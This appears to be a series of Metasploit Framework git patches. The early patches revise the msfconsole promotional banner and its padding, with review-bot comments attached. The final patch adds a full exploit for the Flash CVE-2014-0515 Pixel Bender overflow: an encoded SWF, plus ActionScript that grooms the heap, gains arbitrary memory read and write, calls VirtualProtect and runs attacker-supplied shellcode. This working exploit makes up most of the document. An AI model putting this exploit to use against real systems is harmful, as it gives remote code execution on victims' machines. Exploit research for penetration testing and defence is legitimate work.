@@ -386,12 +386,15 @@ class Core if is_apt content = [ - "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.", - "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.", - "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.", - "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro's wizard -- type 'go_pro' to launch it now.", - "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.", - "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now." + "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", + "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", + "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit", + "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- learn more on http://rapid7.com/metasploit", + "Love leveraging credentials? 
Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Save 45% of your time on large engagements with Metaspsloit Pro\n-- learn more on http://rapid7.com/metasploit", + "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro\n-- learn more on http://rapid7.com/metasploit" ] banner << content.sample # Ruby 1.9-ism! banner << "\n\n" From ab56583ce0564c24158f255321ce939f1945ffb6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:49:41 -0500 Subject: [PATCH 253/853] Remove dead oldwarn code, fix shortlink --- lib/msf/ui/console/command_dispatcher/core.rb | 37 +++---------------- 1 file changed, 5 insertions(+), 32 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e2d9375558..0d52105a28 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
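Review bot: One of the added banner strings misspells the product name: `Save 45% of your time on large engagements with Metaspsloit Pro` should read `Metasploit Pro`. The same string is carried with the typo into the later "Fix banner language, padding" patch in this series, so it needs correcting there too. The new links are printed as plain `http://`; if the site serves HTTPS, `https://rapid7.com/metasploit` would be the better URL to show users.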
@@ -400,38 +400,24 @@ class Core banner << "\n\n" end - oldwarn = nil avdwarn = nil banner_trailers = { :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", - :free_trial => "Free Metasploit Pro trial: http://r-7.com/trymsp" + :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp" } - banner << (" =[ %-57s]\n" % banner_trailers[:version]) - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:exp_aux_pos]) - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:pay_enc_nop]) + banner << (" =[ %-56s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:pay_enc_nop]) # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition unless binary_install - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:free_trial]) - end - - if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) - tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") - banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n" - if(::Msf::Framework::RepoUpdatedDays > 7) - oldwarn = [] - oldwarn << "Warning: This copy of the Metasploit Framework was last updated #{::Msf::Framework::RepoUpdatedDaysNote}." - oldwarn << " We recommend that you update the framework at least every other day." 
- oldwarn << " For information on updating your copy of Metasploit, please see:" - oldwarn << " https://community.rapid7.com/docs/DOC-1306" - oldwarn << "" - end + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) end if ::Msf::Framework::EICARCorrupted @@ -443,22 +429,9 @@ class Core avdwarn << "" end - # We're running a two week survey to gather feedback from users. - # Let's make sure we reach regular msfconsole users. - # TODO: Get rid of this sometime after 2014-01-23 - survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00") - if Time.now.to_i < survey_expires.to_i - banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5 ]\n" - banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n" - end - # Display the banner print_line(banner) - if(oldwarn) - oldwarn.map{|line| print_line(line) } - end - if(avdwarn) avdwarn.map{|line| print_error(line) } end From c50c929412a63527ee9611537444603e45aa56e9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 15:59:50 -0500 Subject: [PATCH 254/853] Treat apt and binary installs the same for banners --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0d52105a28..1eb1da8b1c 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -384,7 +384,7 @@ class Core def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" - if is_apt + if (is_apt || binary_install) content = [ "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", 
@@ -416,7 +416,7 @@ class Core # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition - unless binary_install + unless (is_apt || binary_install) banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) end From eecd05ec74162c370957140f6d4d3711382da40e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 16:12:15 -0500 Subject: [PATCH 255/853] Fix banner language, padding. --- lib/msf/ui/console/command_dispatcher/core.rb | 27 ++++++++++--------- 1 file changed, 14 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 1eb1da8b1c..d59f853289 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -384,6 +384,8 @@ class Core def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" + # These messages should /not/ show up when you're on a git checkout; + # you're a developer, so you already know all this. if (is_apt || binary_install) content = [ "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", 
@@ -391,10 +393,10 @@ class Core "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit", - "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- learn more on http://rapid7.com/metasploit", + "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit", "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", - "Save 45% of your time on large engagements with Metaspsloit Pro\n-- learn more on http://rapid7.com/metasploit", - "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro\n-- learn more on http://rapid7.com/metasploit" + "Save 45% of your time on large engagements with Metaspsloit Pro\nLearn more on http://rapid7.com/metasploit", + "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit" ] banner << content.sample # Ruby 1.9-ism! banner << "\n\n" 
@@ -406,19 +408,18 @@ class Core :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", - :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp" + :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp", + :padding => 48 } - banner << (" =[ %-56s]\n" % banner_trailers[:version]) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:exp_aux_pos]) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:pay_enc_nop]) + banner << (" =[ %-#{banner_trailers[:padding]+8}s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:pay_enc_nop]) - # Direct the user to the 14-day free trial of Metasploit Pro unless - # they are on an apt install or already using Metasploit Pro, - # Express, or Community edition - unless (is_apt || binary_install) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) - end + # TODO: People who are already on a Pro install shouldn't see this. + # It's hard for Framework to tell the difference though since + # license details are only in Pro -- we can't see them from here. + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:free_trial]) if ::Msf::Framework::EICARCorrupted avdwarn = [] From 5fd732d24a61d559bd17ea20a1bfcf583ba025e3 Mon Sep 17 00:00:00 2001 
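Review bot: The `+8` in `%-#{banner_trailers[:padding]+8}s` is unexplained; it presumably compensates for the `%yel` and `%clr` colour markers in `:version`, which count toward the sprintf width but are not printed. A comment such as `# +8: the %yel/%clr markers take up width but are not displayed` would keep the next edit from breaking the alignment. Storing the integer `:padding` in the same hash as the banner strings also mixes layout with content; a separate local (`padding = 48`) would read more clearly.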
From: jvazquez-r7 Date: Wed, 7 May 2014 17:13:16 -0500 Subject: [PATCH 256/853] Add module for CVE-2014-0515 --- data/exploits/CVE-2014-0515/Graph.swf | Bin 0 -> 4943 bytes .../source/exploits/CVE-2014-0515/Graph.as | 410 ++++++++++++++++++ .../exploits/CVE-2014-0515/Graph_Shad.as | 10 + .../source/exploits/CVE-2014-0515/binary_data | Bin 0 -> 2425 bytes .../adobe_flash_filters_type_confusion.rb | 1 - .../browser/adobe_flash_pixel_bender_bof.rb | 129 ++++++ 6 files changed, 549 insertions(+), 1 deletion(-) create mode 100755 data/exploits/CVE-2014-0515/Graph.swf create mode 100755 external/source/exploits/CVE-2014-0515/Graph.as create mode 100755 external/source/exploits/CVE-2014-0515/Graph_Shad.as create mode 100755 external/source/exploits/CVE-2014-0515/binary_data create mode 100644 modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb 
diff --git a/data/exploits/CVE-2014-0515/Graph.swf b/data/exploits/CVE-2014-0515/Graph.swf new file mode 100755 index 0000000000000000000000000000000000000000..aa30c2421e2ed20fe89b98f880289bffe90aae6c GIT binary patch literal 4943 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 NaUZoJ{{zmB|L_W;W}*N9 literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as new file mode 100755 index 0000000000..4982447997 --- /dev/null +++ b/external/source/exploits/CVE-2014-0515/Graph.as 
@@ -0,0 +1,410 @@ +package { + import flash.display.Sprite; + import flash.utils.ByteArray; + import flash.display.Shader; + import flash.system.Capabilities; + import flash.net.FileReference; + import flash.utils.Endian; + import __AS3__.vec.Vector; + import __AS3__.vec.*; + import flash.display.LoaderInfo; + + public class Graph extends Sprite { + + static var counter:uint = 0; + + protected var Shad:Class; + var shellcode_byte_array:ByteArray; + var aaab:ByteArray; + var shellcodeObj:Array; + + public function Graph(){ + var tweaked_vector:* = undefined; + var tweaked_vector_address:* = undefined; + var shader:Shader; + var flash_memory_protect:Array; + var code_vectors:Array; + var address_code_vector:uint; + var address_shellcode_byte_array:uint; + this.Shad = Graph_Shad; + super(); + shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); + var i:* = 0; + var j:* = 0; + + // Just one try + counter++; + if (counter > 1) + { + return; + }; + + // Memory massage + var array_length:uint = 0x10000; + var vector_size:uint = 34; + var array:Array = new Array(); + i = 0; + while (i < array_length) + { + array[i] = new Vector.(1); + i++; + }; + i = 0; + while (i < array_length) + { + array[i] = new Vector.(vector_size); + i++; + }; + i = 0; + while (i < array_length) + { + array[i].length = 0; + i++; + }; + i = 0x0200; + while (i < array_length) + { + array[(i - (2 * (j % 2)))].length = 0x0100; + i = (i + 28); + j++; + }; + + // Overflow and Search for corrupted vector + var corrupted_vector_idx:uint; + var shadba:ByteArray = (new this.Shad() as ByteArray); + shadba.position = 232; + if (Capabilities.os.indexOf("Windows 8") >= 0) + { + shadba.writeUnsignedInt(2472); + }; + shadba.position = 0; + while (1) + { + shader = new Shader(); + try + { + shader.byteCode = (new this.Shad() as ByteArray); + } catch(e) + { + }; + i = 0; + while (i < array_length) + { + if (array[i].length > 0x0100) + { + corrupted_vector_idx = i; + break; + }; + i++; + }; + if 
(i != array_length) + { + if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break; + }; + array.push(new Vector.(vector_size)); + }; + + // Tweak the vector following the corrupted one + array[corrupted_vector_idx][vector_size] = 0x40000001; + tweaked_vector = array[(corrupted_vector_idx + 1)]; + + // repair the corrupted vector by restoring its + // vector object pointer and length + var vector_obj_addr:* = tweaked_vector[0x3fffffff]; + tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr; + tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size; + i = 0; + var val:uint; + while (true) + { + val = tweaked_vector[(0x40000000 - i)]; + if (val == 0x90001B) break; + i++; + }; + tweaked_vector_address = 0; + if (tweaked_vector[((0x40000000 - i) - 4)] > 0) + { + tweaked_vector[4] = 0x41414141; + tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8); + }; + + // More memory massage, fill an array of FileReference objects + var file_reference_array:Array = new Array(); + i = 0; + while (i < 64) + { + file_reference_array[i] = new FileReference(); + i++; + }; + + var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address); + var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20)); + var do_it:Boolean = true; + var memory_protect_ptr:uint; + var aaaq:uint; + if (do_it) + { + flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address); + memory_protect_ptr = flash_memory_protect[0]; + aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment + code_vectors = this.createCodeVectors(0x45454545, 0x90909090); + address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545); + this.fillCodeVectors(code_vectors); + tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call + 
tweaked_vector[4] = aaaq; + tweaked_vector[0] = 0x1000; // Length + tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address + + // 10255e21 ff5014 call dword ptr [eax+14h] ds:0023:41414155=???????? + this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8)); + + // 1) Set memory as executable + i = 0; + while (i < 64) + { + file_reference_array[i].cancel(); + i++; + }; + + // 2) Execute shellcode + tweaked_vector[7] = address_code_vector; + i = 0; + while (i < 64) + { + file_reference_array[i].cancel(); + i++; + }; + + // Restore FileReference cancel function pointer + // Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads + this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address); + }; + } + + // returns the integer at memory address + // vector: vector with tweaked length + // vector_address: vector's memory address + // address: memory address to read + function read_memory(vector:Vector., vector_address:uint, address:uint):uint{ + if (address >= vector_address) + { + return (vector[((address - vector_address) / 4)]); + }; + return (vector[(0x40000000 - ((vector_address - address) / 4))]); + } + + function write_memory(vector:Vector., vector_address:uint, address:uint, value:uint){ + if (address >= vector_address) + { + vector[((address - vector_address) / 4)] = value; + } else + { + vector[(0x40000000 - ((vector_address - address) / 4))] = value; + }; + } + + function findFlashMemoryProtect(vector:*, vector_address:*):Array{ + var content:uint; + var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); + var index:uint; + var memory_protect_ptr:uint; + var _local_6:uint; + if (allocation >= vector_address) + { + index = ((allocation - vector_address) / 4); + } else + { + index = (0x40000000 - ((vector_address - allocation) / 4)); + }; + + 
//push 1 ; 6a 01 + //push dword ptr [eax-8] ; ff 70 f8 + //push dword ptr [eax-4] ; ff 70 fc + //call sub_1059DD00 // Will do VirtualProtect + var offset:uint; + while (1) + { + index--; + content = vector[index]; + if (content == 0xfff870ff) + { + offset = 2; + break; + }; + if (content == 0xf870ff01) + { + offset = 1; + break; + }; + if (content == 0x70ff016a) + { + content = vector[(index + 1)]; + if (content == 0xfc70fff8) + { + offset = 0; + break; + }; + } else + { + if (content == 0x70fff870) + { + offset = 3; + break; + }; + }; + }; + + memory_protect_ptr = ((vector_address + (4 * index)) - offset); + index--; + var content_before:uint = vector[index]; + + if (content_before == 0x16a0424) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0x6a042444) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0x424448b) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0xff016a04) + { + return ([memory_protect_ptr, _local_6]); + }; + _local_6 = (memory_protect_ptr - 6); + + while (1) + { + index--; + content = vector[index]; + if (content == 0x850ff50) + { + if (uint(vector[(index + 1)]) == 0x5e0cc483) + { + offset = 0; + break; + }; + }; + content = (content & 0xFFFFFF00); + if (content == 0x50FF5000) + { + if (uint(vector[(index + 1)]) == 0xcc48308) + { + offset = 1; + break; + }; + }; + content = (content & 0xFFFF0000); + if (content == 0xFF500000) + { + if (uint(vector[(index + 1)]) == 0xc4830850) + { + if (uint(vector[(index + 2)]) == 0xc35d5e0c) + { + offset = 2; + break; + }; + }; + }; + content = (content & 0xFF000000); + if (content == 0x50000000) + { + if (uint(vector[(index + 1)]) == 0x830850ff) + { + if (uint(vector[(index + 2)]) == 0x5d5e0cc4) + { + offset = 3; + break; + }; + }; + }; + }; + memory_protect_ptr = ((vector_address + (4 * index)) + offset); + return ([memory_protect_ptr, _local_6]); + } + + // vector: vector with tweaked length + // address: memory address of 
vector data + function find_file_ref_vtable(vector:*, address:*):uint{ + var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c)); + + // Find an allocation of size 0x2a0 + var allocation_size:uint; + while (true) + { + allocation_size = this.read_memory(vector, address, (allocation + 8)); + if (allocation_size == 0x2a0) break; + if (allocation_size < 0x2a0) + { + allocation = (allocation + 0x24); // next allocation + } else + { + allocation = (allocation - 0x24); // prior allocation + }; + }; + var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc)); + while (true) + { + if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break; + if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break; + allocation_contents = this.read_memory(vector, address, (allocation_contents + 8)); + }; + return (allocation_contents); + } + + // Returns pointer to the nops in one of the allocated code vectors + function findCodeVector(vector:*, vector_address:*, mark:*):uint{ + var allocation_size:uint; + var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); + while (true) + { + allocation_size = this.read_memory(vector, vector_address, (allocation + 8)); + if (allocation_size == 0x7f0) break; // Code Vector found + allocation = (allocation + 0x24); // next allocation + }; + + // allocation contents should be the vector code, search for the mark 0x45454545 + var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc)); + while (true) + { + if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break; + allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation + }; + return ((allocation_contents + 0x2c)); + } + + // create 8 vectors of size 0x7f0 inside an array to place shellcode + function 
createCodeVectors(mark:uint, nops:uint){ + var code_vectors_array:Array = new Array(); + var i:* = 0; + while (i < 8) + { + code_vectors_array[i] = new Vector.(((0x7f0 / 4) - 8)); // new Vector.(0x1f4) + code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4 + code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4 + i++; + }; + return (code_vectors_array); + } + + + // Fill with the code vectors with the shellcode + function fillCodeVectors(array_code_vectors:Array) { + var i:uint = 0; + var sh:uint=1; + + while(i < array_code_vectors.length) + { + for(var u:String in shellcodeObj) + { + array_code_vectors[i][sh++] = Number(shellcodeObj[u]); + } + i++; + sh = 1; + } + } + } +}//package diff --git a/external/source/exploits/CVE-2014-0515/Graph_Shad.as b/external/source/exploits/CVE-2014-0515/Graph_Shad.as new file mode 100755 index 0000000000..c0e84dff5d --- /dev/null +++ b/external/source/exploits/CVE-2014-0515/Graph_Shad.as @@ -0,0 +1,10 @@ +package +{ + import mx.core.ByteArrayAsset; + + [Embed(source="binary_data", mimeType="application/octet-stream")] + public class Graph_Shad extends ByteArrayAsset + { + + } +} \ No newline at end of file diff --git a/external/source/exploits/CVE-2014-0515/binary_data b/external/source/exploits/CVE-2014-0515/binary_data new file mode 100755 index 0000000000000000000000000000000000000000..8d83cb55c9051e86159e7a3eeae6a1dc1997ddca GIT binary patch literal 2425 zcmeH}L2DCH5Xb+!Zx@9IT(6bDT098_lT`8KZWHk&=*gStn!Lbbx+%Mx(t6sHAHk!f zQSahew3Q-$9Hk#X|MT_*V?^;Hz2sdcGw;otncog?^2P!1dJVn&peU2kD1D}EKl15@zQHdYDW`W$n5>Wsz$)>DcY|xNdW8b9K4?Mc<;kgk8xMhqLH| z8|*(>E4kuu7JV@Leq2*KG zaIq!#GYI#;LQ%^8I`?ICm^cz&ArZSnY4S1qkBz@q@6#`k{rUZ7^hh4j^Wl*30+tRX zhbV=IizDF>ey({0CST$4@ZF~H_*mB&MzsvY{#PE>&z=vhzwvAPs7xFmvBV*dmgQkM 